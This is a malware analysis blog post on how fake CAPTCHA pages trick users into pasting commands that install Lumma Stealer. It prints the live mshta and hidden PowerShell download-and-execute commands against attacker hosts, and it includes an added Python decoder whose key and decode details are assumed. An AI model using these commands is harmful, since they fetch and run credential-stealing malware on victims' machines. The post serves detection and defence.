How a clipboard hijacker delivers Lumma Stealer - ThreatDown by Malwarebytes
Pieter Arntz · 2025-01-27 · via Threat Walkthroughs – ThreatDown by Malwarebytes

The use of fake CAPTCHA websites has doubled in only a few months.

Cybercriminal tactics ebb and flow over time, depending on environmental factors, the preferences of the groups involved, and what’s making money. Right now, criminals are showing renewed enthusiasm for clipboard hijacking and fake CAPTCHAs, a tactic that fools users into pasting malicious code into their computers.

Earlier this month, we described in detail how cybercriminals used clipboard hijacking to infect website visitors with a Trojan. The attack relied on a CAPTCHA lookalike with instructions that paste the clipboard contents into a command line.

[Image: A fake CAPTCHA used in a clipboard hijacking attack]

The fake CAPTCHA instructions are found on all kinds of websites, but mostly fake web shops, news sites, and websites offering media like music and movies.

As researchers from ReliaQuest recently pointed out, the number of fake CAPTCHA pages nearly doubled from September 2024 to December 2024. And it’s not just criminals spreading Remote Access Trojans and information stealers any more—advanced threat actors like APT28 (aka Fancy Bear) are successfully employing these tactics as well.

So, we decided to dive a bit deeper into the tactics, techniques, and procedures (TTPs) behind these attacks.

Our Managed Detection & Response (MDR) team soon found an example where cybercriminals tried to infect one of our customers with Lumma Stealer malware.

The website tried to load the following command into the victim’s clipboard. Executing the instructions on the fake CAPTCHA would have pasted it into a command line and run it.

mshta https://eprime.shop/s6.mp3 ''I am not a robot - reCAPTCHA Verification ID: 2165

The command uses a trusted utility, MSHTA, to download an encoded PowerShell script:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 Enc JABkAFEAQwa2AEYAbgB4AHAAOQBDAHkaZAA4AEwATgBTAGMARwBqAFoAVABCAG...BHAF0AOgA6AEEAUwBDAEkASQAkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=
  • The -w 1 switch (-WindowStyle 1, i.e. Hidden) ensures the PowerShell window isn’t visible when the script runs.
  • The Enc switch (-EncodedCommand) indicates that the argument that follows is the command itself, encoded in Base64.

Effectively, this script downloads a very obfuscated PowerShell script called Nusku.jpeg.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command'iex((New-Object System.Net.WebClient).DownloadString('https://n.kliphirofey.shop/Nusku.jpeg'))'
  • The -ep bypass switch (-ExecutionPolicy Bypass) allows PowerShell to execute scripts without any restrictions, ignoring the current execution policy settings.
  • The -nop switch (-NoProfile) prevents PowerShell from loading the user profile scripts when starting. This speeds up startup and also avoids any interference from user-specific configurations or scripts that might be set in the profile.
  • The -Command switch indicates that what follows is a command or script to execute directly in PowerShell.

The script hidden in Nusku.jpeg contains numerous complex mathematical operations and variable assignments, which obscure its purpose, and it includes several while loops and conditional statements that control the flow of execution based on the values of the variables. The main reason for the complexity is to frustrate reverse engineering and sandbox analysis, which may give up if the script takes too long to unwind.

Thankfully, one of our researchers spotted the significant part of the script: a function called fdsjnh.

This function decodes a Base64-encoded string that has been obfuscated through character manipulation and XOR encryption. The key steps involve creating an ArrayList from a string, decoding it from Base64, and then decrypting it using an XOR operation with another byte array derived from a hardcoded string.

Manually, you would have to de-obfuscate this script by looking for repeated calculations, checking whether they can be simplified, and then breaking the complex expressions down into simpler, more readable forms.

But with help from the researcher, putting a breakpoint on the return expression of the fdsjnh function did the job (the variable $kcuVdyrjJenvYgEdy contains the second script).
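Setting a breakpoint on the return expression is the fastest route when you can run the sample, but the decode scheme described for fdsjnh (Base64-decode the obfuscated string, then XOR it with a byte array derived from a hardcoded string) is also simple enough to re-implement offline, which avoids executing any of the surrounding anti-analysis loops at all. The following Python is an added example of that, written for this page; it is not the malware's own code and not ThreatDown/Malwarebytes tooling. The page does not show how the key bytes are derived or what the "character manipulation" step is, so the example assumes the key is the UTF-8 bytes of the hardcoded string, applied as a repeating XOR key, and that the manipulation is a plain string reversal; both are labelled assumptions in the code. The obfuscated sample it decodes is constructed from a harmless placeholder script. It also includes a known-plaintext step that recovers key bytes from an expected script prefix, which is what you would do when the hardcoded string is itself buried in the obfuscation.

```python
"""Re-implementation of the decode scheme described for the fdsjnh function:
Base64-decode an obfuscated string, then XOR with a repeating key derived from
a hardcoded string. Added example for this page; not the malware's code and not
ThreatDown/Malwarebytes code. ASSUMPTIONS: key = UTF-8 bytes of the hardcoded
string; the unspecified 'character manipulation' step is a string reversal.
The obfuscated sample below is constructed from a harmless placeholder script."""
import base64
from itertools import cycle


def key_bytes(hardcoded):
    # Assumption: the key is the raw UTF-8 encoding of the hardcoded string.
    return hardcoded.encode("utf-8")


def xor_bytes(data, key):
    """XOR data with a repeating key (XOR is its own inverse)."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def unwrap(obfuscated, reversed_input=True):
    """Undo the assumed character manipulation (reversal) and the Base64 layer."""
    text = obfuscated[::-1] if reversed_input else obfuscated
    return base64.b64decode(text)


def decode_stage(obfuscated, hardcoded_key, reversed_input=True):
    """Full decode: unwrap, then XOR with the derived key, then UTF-8 decode."""
    raw = unwrap(obfuscated, reversed_input)
    return xor_bytes(raw, key_bytes(hardcoded_key)).decode("utf-8")


def recover_key(raw, crib):
    """Known-plaintext step: if the decoded script is expected to start with
    `crib`, XORing the ciphertext prefix with it yields the first key bytes."""
    crib_bytes = crib.encode("utf-8")
    return xor_bytes(raw[:len(crib_bytes)], crib_bytes)


def encode_stage(script, hardcoded_key, reverse_output=True):
    """Inverse of decode_stage; used only to build the constructed sample."""
    raw = xor_bytes(script.encode("utf-8"), key_bytes(hardcoded_key))
    text = base64.b64encode(raw).decode("ascii")
    return text[::-1] if reverse_output else text


# Constructed sample: a harmless placeholder "second stage" and a made-up key.
SAMPLE_SCRIPT = "function Invoke-Placeholder { Write-Output 'stage two placeholder' }"
SAMPLE_KEY = "constructed-demo-key"
SAMPLE_OBFUSCATED = encode_stage(SAMPLE_SCRIPT, SAMPLE_KEY)

if __name__ == "__main__":
    print(decode_stage(SAMPLE_OBFUSCATED, SAMPLE_KEY))
    # Key recovery from a crib: PowerShell stagers frequently begin with
    # "function " or "$", so try those prefixes when the key is not in view.
    print(recover_key(unwrap(SAMPLE_OBFUSCATED), "function "))
```

In practice the only parts that change between samples are the key-derivation rule and the pre-Base64 manipulation; once those two are pinned down (by reading the function or by the crib step above), `decode_stage` turns the whole second stage into plain text that can be hashed and matched against the IOCs without ever letting the script run.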

This script turned out to be responsible for loading and executing a Portable Executable (PE) payload—Lumma Stealer—in memory, although it could be used to drop any type of malware in the memory of an affected system.

IOCs

https://findinmind[.]com/play.html
https://eprime[.]shop/s6.mp3
https://echoicedeals[.]shop/s6.mp3
https://etrademart[.]shop/s6.mp3
https://sharethewebs[.]shop/s5.swf
https://pomppie[.]shop/RUKE.mp4
https://n.kliphirofey[.]shop/Nusku.jpeg
4bd70b088c9c5aa80506a06c10f0d3ad27762bd04f6354cd8c9d9ee061cb41b7 (Nusku.jpeg)
53b7bfacc441837432f32613646fb10de2bb3c621d1c9835efaceb9e63a1d099 (payload)